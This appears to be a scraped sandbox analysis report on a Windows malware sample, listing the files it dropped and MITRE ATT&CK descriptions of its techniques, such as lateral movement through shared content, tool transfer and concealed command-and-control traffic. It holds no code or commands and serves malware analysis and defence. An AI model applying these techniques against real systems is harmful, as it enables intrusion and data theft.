URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\MPGPH131\MPGPH131.exe

C:\ProgramData\MPGPH131\MPGPH131.exe:Zone.Identifier

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_jHYZko.exe_d8685fa3666ef0170de53ca60392592e0c360b1_2472fd22_e3a77683-1b53-4759-a244-058d1fe851d7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA7B2.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAADF.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB0F.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[2].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k2[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k2[2].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k3[1].rar

Windows Analysis Report
Lisect_AVT_24003_G1A_89.exe

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre